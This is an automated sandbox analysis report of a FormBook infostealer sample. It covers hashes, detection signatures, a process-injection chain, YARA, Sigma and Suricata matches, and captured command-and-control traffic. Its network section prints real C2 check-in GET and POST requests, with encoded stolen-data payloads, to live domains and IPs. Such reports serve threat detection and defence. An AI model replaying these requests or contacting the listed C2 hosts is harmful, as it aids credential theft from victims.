
Windows Analysis Report
BLv4mI7zzY.exe

Overview

General Information

Sample name: BLv4mI7zzY.exe (renamed because the original name is a hash value)
Original sample name: 54b7de7fe1e5480be40821947816c7abbc49dcc98a307f8fb961405aa58b15c5.exe
Analysis ID: 1588799
MD5: b6a92ee2ba34b81fa9484072b4d20072
SHA1: 0726cc609fcd36cdf9634faacce3d77d16c9129b
SHA256: 54b7de7fe1e5480be40821947816c7abbc49dcc98a307f8fb961405aa58b15c5
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • BLv4mI7zzY.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\BLv4mI7zzY.exe" MD5: B6A92EE2BA34B81FA9484072B4D20072)
    • svchost.exe (PID: 4900 cmdline: "C:\Users\user\Desktop\BLv4mI7zzY.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XNNdkVYUhBbatb.exe (PID: 3880 cmdline: "C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp_isv.exe (PID: 5156 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp_isv.exe" MD5: E7516E154D7AEE0ECD4BF892C3BC33C2)
          • firefox.exe (PID: 2276 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches (memory dumps)

Source | Rule | Description | Author
00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(3 further memory-dump matches are not shown in this excerpt; see the AV Detection section below for the full list of matched dumps)

Yara matches (unpacked PE files)

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

Sigma rule matches

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\BLv4mI7zzY.exe", CommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", ParentImage: C:\Users\user\Desktop\BLv4mI7zzY.exe, ParentProcessId: 6568, ParentProcessName: BLv4mI7zzY.exe, ProcessCommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", ProcessId: 4900, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\BLv4mI7zzY.exe", CommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", ParentImage: C:\Users\user\Desktop\BLv4mI7zzY.exe, ParentProcessId: 6568, ParentProcessName: BLv4mI7zzY.exe, ProcessCommandLine: "C:\Users\user\Desktop\BLv4mI7zzY.exe", ProcessId: 4900, ProcessName: svchost.exe

Suricata IDS alerts (SID 2050745, ET MALWARE FormBook CnC Checkin (GET) M5)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:39:48.471913+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 53765 | 162.218.30.235 | 80 | TCP
2025-01-11T05:40:21.142542+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 53770 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:42.945271+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 53775 | 209.74.79.40 | 80 | TCP

Suricata IDS alerts (SID 2855465, ETPRO MALWARE FormBook CnC Checkin (GET) M2)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:39:48.471913+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 53765 | 162.218.30.235 | 80 | TCP
2025-01-11T05:40:21.142542+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 53770 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:42.945271+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 53775 | 209.74.79.40 | 80 | TCP

Suricata IDS alerts (SID 2855464, ETPRO MALWARE FormBook CnC Checkin (POST) M3)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T05:40:13.477922+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 53767 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:16.043618+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 53768 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:18.584119+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 53769 | 13.228.81.39 | 80 | TCP
2025-01-11T05:40:35.162238+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 53771 | 209.74.79.40 | 80 | TCP
2025-01-11T05:40:37.704071+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 53772 | 209.74.79.40 | 80 | TCP
2025-01-11T05:40:40.244395+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 53774 | 209.74.79.40 | 80 | TCP
2025-01-11T05:40:50.123152+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 53776 | 47.254.140.255 | 80 | TCP


                AV Detection

Source: BLv4mI7zzY.exe; Virustotal: Detection: 56%
Source: BLv4mI7zzY.exe; ReversingLabs: Detection: 63%
Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: BLv4mI7zzY.exe; Joe Sandbox ML: detected
Source: BLv4mI7zzY.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541536503.000000000036E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: rmactivate_ssp_isv.pdb source: svchost.exe, 00000002.00000003.2591648376.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2591551520.000000000301A000.00000004.00000020.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702781389.0000000000E0F000.00000004.00000001.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702694345.00000000057E1000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: BLv4mI7zzY.exe, 00000000.00000003.2127277908.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, BLv4mI7zzY.exe, 00000000.00000003.2136217701.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527010916.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2525232719.0000000003300000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2622792631.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2626116189.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.000000000303E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: BLv4mI7zzY.exe, 00000000.00000003.2127277908.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, BLv4mI7zzY.exe, 00000000.00000003.2136217701.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2624304199.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2624304199.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2527010916.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2525232719.0000000003300000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, RMActivate_ssp_isv.exe, 00000006.00000003.2622792631.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000003.2626116189.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.000000000303E000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365425570.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005BBC000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000034CC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FAAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: XNNdkVYUhBbatb.exe, 00000005.00000002.3370679598.0000000005BBC000.00000004.80000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.00000000034CC000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp_isv.exe, 00000006.00000002.3361688782.0000000000733000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2922696805.000000001FAAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rmactivate_ssp_isv.pdbGCTL source: svchost.exe, 00000002.00000003.2591648376.0000000003501000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2591551520.000000000301A000.00000004.00000020.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702781389.0000000000E0F000.00000004.00000001.00020000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000003.2702694345.00000000057E1000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_0049445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0049445A
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_0049C6D1 FindFirstFileW,FindClose,0_2_0049C6D1
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_0049C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0049C75C
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_0049EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049EF95
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_0049F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049F0F2
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_0049F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0049F3F3
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_004937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004937EF
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_00493B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00493B12
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_0049BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0049BCBC
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe; Code function: 6_2_0061C400 FindFirstFileW,FindNextFileW,FindClose,6_2_0061C400
Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe; Code function: 4x nop then pop edi, 5_2_027E7925
Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe; Code function: 4x nop then xor eax, eax, 5_2_027EB7F9
Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe; Code function: 4x nop then pop edi, 5_2_027E5F88
Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe; Code function: 4x nop then pop edi, 5_2_027E6C47
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe; Code function: 4x nop then xor eax, eax, 6_2_00609DC0
Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe; Code function: 4x nop then mov ebx, 00000004h, 6_2_02C904E5

                Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:53765 -> 162.218.30.235:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53765 -> 162.218.30.235:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53768 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53774 -> 209.74.79.40:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53767 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:53775 -> 209.74.79.40:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53775 -> 209.74.79.40:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53769 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53772 -> 209.74.79.40:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:53770 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:53770 -> 13.228.81.39:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53776 -> 47.254.140.255:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:53771 -> 209.74.79.40:80
Source: DNS query: www.l54354.xyz
Source: global traffic; TCP traffic: 192.168.2.6:53574 -> 1.1.1.1:53
Source: Joe Sandbox View; IP Address: 209.74.79.40
Source: Joe Sandbox View; IP Address: 13.228.81.39
Source: Joe Sandbox View; ASN Name: MULTIBAND-NEWHOPEUS
Source: Joe Sandbox View; ASN Name: ANT-CLOUDUS
Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
Source: C:\Users\user\Desktop\BLv4mI7zzY.exe; Code function: 0_2_004A22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004A22EE
Source: global traffic; HTTP traffic detected:
GET /jq20/?pLNPctn=Y1tg4+SOL5eE+AycCXTvziB71yBrg1O91RsaYXN25C6htIJcZWWT4ijvmmdbSmKvee6IP68K4FvBkloeJ7ydTRz05iBunvLV+SpSL2s6yDyPdWIOZH0K/EFLjzJIDWXT1oCQnJs=&yL=ohjXjzZp0vl4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.l54354.xyz
Connection: close
User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)

Source: global traffic; HTTP traffic detected:
GET /iz19/?pLNPctn=UssFuDgs3yWnyhEQP3EfYsAhRMCH7zgrCGcgkyD6ajj4AvMHk5wjtqALVi5dIoOJqD+HUHGBnnVErrmet4uT5RoiUvX8LNA/Wgeh3xkS0BPrPIhQ4lBFRDGS5W/EZ42X8WJqP+8=&yL=ohjXjzZp0vl4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.sharefree88k24.click
Connection: close
User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)

Source: global traffic; HTTP traffic detected:
GET /bq63/?yL=ohjXjzZp0vl4&pLNPctn=JMKUEBcn+eAmAFujaEF1qxeVIjz6+zqaFMGoHelGSQfwy8OfYyWy6eToJbov20XPgBo7nj3xQKoGJ28WWnvYSwxzVh5Y8omsVuJaqqj7jyf3zIW+vgojp3i5Cusjdn8f20Ku4TQ= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.shopphere.store
Connection: close
User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
Source: RMActivate_ssp_isv.exe, 00000006.00000002.3365994280.0000000003BD8000.00000004.10000000.00040000.00000000.sdmp; String found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com (equals www.facebook.com (Facebook))
Source: global traffic; DNS traffic detected: DNS query: www.l54354.xyz
Source: global traffic; DNS traffic detected: DNS query: www.valdevez.net
Source: global traffic; DNS traffic detected: DNS query: www.sharefree88k24.click
Source: global traffic; DNS traffic detected: DNS query: www.tizzles.tech
Source: global traffic; DNS traffic detected: DNS query: www.shopphere.store
Source: global traffic; DNS traffic detected: DNS query: www.odvfr.info
Source: unknown; HTTP traffic detected:
POST /iz19/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.sharefree88k24.click
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 212
Cache-Control: max-age=0
Origin: http://www.sharefree88k24.click
Referer: http://www.sharefree88k24.click/iz19/
User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
Data Raw: 70 4c 4e 50 63 74 6e 3d 5a 75 45 6c 74 30 59 72 7a 43 43 69 6b 77 4a 42 59 6e 30 61 50 35 77 6b 54 70 36 39 76 67 4e 53 4a 53 59 65 72 7a 6e 53 62 41 6e 2b 4b 73 34 49 6c 4d 73 44 74 72 30 41 54 44 78 66 65 38 57 50 76 6a 69 33 46 30 61 4c 69 6b 42 78 67 72 4f 69 6e 61 37 6f 78 6a 64 50 51 37 6e 33 45 74 67 51 61 32 61 63 2f 78 51 65 38 79 53 69 59 75 52 4c 76 56 31 49 64 58 65 34 34 32 53 68 53 70 54 66 31 53 41 32 51 72 64 70 63 4e 42 78 44 6f 66 6a 47 77 2b 46 45 58 64 79 49 35 63 68 4f 63 38 74 46 46 75 6a 4a 48 71 68 35 62 63 48 6f 57 65 55 74 33 61 55 39 30 4c 47 34 50 56 4f 30 54 52 7a 2f 66 2f 6c 76 39 68 4b 4b 65 43 4a
Data Ascii: pLNPctn=ZuElt0YrzCCikwJBYn0aP5wkTp69vgNSJSYerznSbAn+Ks4IlMsDtr0ATDxfe8WPvji3F0aLikBxgrOina7oxjdPQ7n3EtgQa2ac/xQe8ySiYuRLvV1IdXe442ShSpTf1SA2QrdpcNBxDofjGw+FEXdyI5chOc8tFFujJHqh5bcHoWeUt3aU90LG4PVO0TRz/f/lv9hKKeCJ

Source: global traffic; HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 04:40:35 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: global traffic; HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 04:40:37 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
